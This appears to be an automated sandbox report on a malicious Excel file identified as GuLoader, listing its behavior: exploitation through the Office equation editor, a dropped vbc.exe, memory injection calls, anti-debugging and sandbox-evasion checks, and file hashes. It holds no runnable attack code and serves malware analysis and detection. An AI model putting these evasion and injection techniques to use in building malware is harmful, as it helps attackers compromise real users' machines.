Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8EC2	9_2_001B8EC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9B3B	9_2_001B9B3B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4B39	9_2_001B4B39
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4933	9_2_001B4933
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4523	9_2_001B4523
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9F	9_2_001B8F9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4D95	9_2_001B4D95
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8D8F	9_2_001B8D8F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81	9_2_001B5D81
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8FB1	9_2_001B8FB1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9DB7	9_2_001B9DB7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4DAB	9_2_001B4DAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B59A3	9_2_001B59A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3DA1	9_2_001B3DA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA0	9_2_001B7DA0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7FFF	9_2_001B7FFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF	9_2_001B8BFF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B49EB	9_2_001B49EB

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D26BE NtWriteVirtualMemory,	6_2_003D26BE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D0EAE CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,	6_2_003D0EAE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D1F NtWriteVirtualMemory,NtAllocateVirtualMemory,	6_2_003D5D1F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D958B NtProtectVirtualMemory,	6_2_003D958B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4835 NtWriteVirtualMemory,	6_2_003D4835
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D960D NtProtectVirtualMemory,	6_2_003D960D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F NtWriteVirtualMemory,	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5E07 NtAllocateVirtualMemory,	6_2_003D5E07
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5003 NtWriteVirtualMemory,	6_2_003D5003
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D507A NtWriteVirtualMemory,	6_2_003D507A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4266 NtWriteVirtualMemory,	6_2_003D4266
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4CB6 NtWriteVirtualMemory,	6_2_003D4CB6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D469F NtWriteVirtualMemory,	6_2_003D469F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4E8F NtWriteVirtualMemory,	6_2_003D4E8F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46F9 NtWriteVirtualMemory,	6_2_003D46F9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D48F4 NtWriteVirtualMemory,	6_2_003D48F4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D46DE NtWriteVirtualMemory,	6_2_003D46DE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4B39 NtWriteVirtualMemory,	6_2_003D4B39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D493B NtWriteVirtualMemory,	6_2_003D493B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4523 NtWriteVirtualMemory,	6_2_003D4523
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D491A NtWriteVirtualMemory,	6_2_003D491A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D73 NtWriteVirtualMemory,	6_2_003D4D73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D49BB NtWriteVirtualMemory,	6_2_003D49BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4DAB NtWriteVirtualMemory,	6_2_003D4DAB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D95 NtWriteVirtualMemory,	6_2_003D4D95
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D4D89 NtWriteVirtualMemory,	6_2_003D4D89
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D5D81 NtAllocateVirtualMemory,	6_2_003D5D81
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D51F3 NtWriteVirtualMemory,	6_2_003D51F3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CD5 NtAllocateVirtualMemory,	9_2_001B5CD5
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5E07 NtAllocateVirtualMemory,	9_2_001B5E07
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D30 NtAllocateVirtualMemory,	9_2_001B5D30
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5D81 NtAllocateVirtualMemory,	9_2_001B5D81

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	Virustotal: Detection: 38%
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR212.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405852 push ebx; ret	6_2_00405854
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004072B2 push cs; iretd	6_2_004072D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040796C push ecx; iretd	6_2_00407985
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040772B push es; iretd	6_2_0040772C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004075F1 push ebx; iretd	6_2_00407601
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D1077 push 0BFD29CAh; retf FD29h	6_2_003D10F2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003DA563 push edx; retf	6_2_003DA569
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8BA0 push edx; retf	6_2_003D8BAB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B843D push es; ret	9_2_001B843E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B15B3 push ebp; iretd	9_2_001B15B6
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BA0 push edx; retf	9_2_001B8BAB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 760

Thread sleep time: -360000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 9848

Jump to behavior

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D8304 rdtsc

6_2_003D8304

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C0F mov eax, dword ptr fs:[00000030h]	6_2_003D8C0F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D8C73 mov eax, dword ptr fs:[00000030h]	6_2_003D8C73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3A50 mov eax, dword ptr fs:[00000030h]	6_2_003D3A50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D58BB mov eax, dword ptr fs:[00000030h]	6_2_003D58BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D3AB1 mov eax, dword ptr fs:[00000030h]	6_2_003D3AB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788C mov eax, dword ptr fs:[00000030h]	6_2_003D788C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D788F mov eax, dword ptr fs:[00000030h]	6_2_003D788F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D7ECE mov eax, dword ptr fs:[00000030h]	6_2_003D7ECE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D39AB mov eax, dword ptr fs:[00000030h]	6_2_003D39AB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003D2F96 mov eax, dword ptr fs:[00000030h]	6_2_003D2F96
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5837 mov eax, dword ptr fs:[00000030h]	9_2_001B5837
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8C73 mov eax, dword ptr fs:[00000030h]	9_2_001B8C73
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788F mov eax, dword ptr fs:[00000030h]	9_2_001B788F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B788C mov eax, dword ptr fs:[00000030h]	9_2_001B788C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7ECE mov eax, dword ptr fs:[00000030h]	9_2_001B7ECE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BAC mov eax, dword ptr fs:[00000030h]	9_2_001B8BAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8BFF mov eax, dword ptr fs:[00000030h]	9_2_001B8BFF

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003D60CF LdrInitializeThunk,

6_2_003D60CF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

ID:	483661
Product:	CloudBasic
Start time:	11:05:36
Start date:	15.09.2021
Sample:	#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	4a1d13469a6c817242e8b567bf34ab9a
SHA1:	a0d54f6c1205defad5f31cadf3393880e7c4c862
SHA256:	65514d1bcd58f206fbc6339c7893a4dc5fb3e7de39177038eac73906ec5c622c
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	451E4CD68C69C2C8B8FC93AD02E8754A	B87D041383FA59A21BFF9666756EFA2784282199	E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0B8B0A.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F521389.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30D76811.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35493F6.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\382BCCC6.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	1F2B5AACC9C5B04A836533E30B3A31F3	18374AF46557DCAE4A34CC6CA4B7F8CAA59934F5	0407CDBEA25671B4478D8E9502F556385A2D0A076947E5BECFBC88A27DCC23DB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A9AFE9C.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D45ADF5.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D264A0F.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EABCC4.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78100EDE.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FF60B83.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E3548CB.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F889450.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988D15ED.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DFC7A8.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC67372.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	31BA65BE1FB493107F7F598925CE6CC5	D732A62C6A995EED0D5CBF4E8BD8CB774BE2BA02	02DF6DD93E56D18723A9A865B0877D0A440A156050DF91B7B81CD8288B94D504
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F26B3547.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	451E4CD68C69C2C8B8FC93AD02E8754A	B87D041383FA59A21BFF9666756EFA2784282199	E406C6674E19F2F3368E26AD4E6D672B190EA5DF8CB1B5E95C9E22FB8C80738B

Windows Analysis Report #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs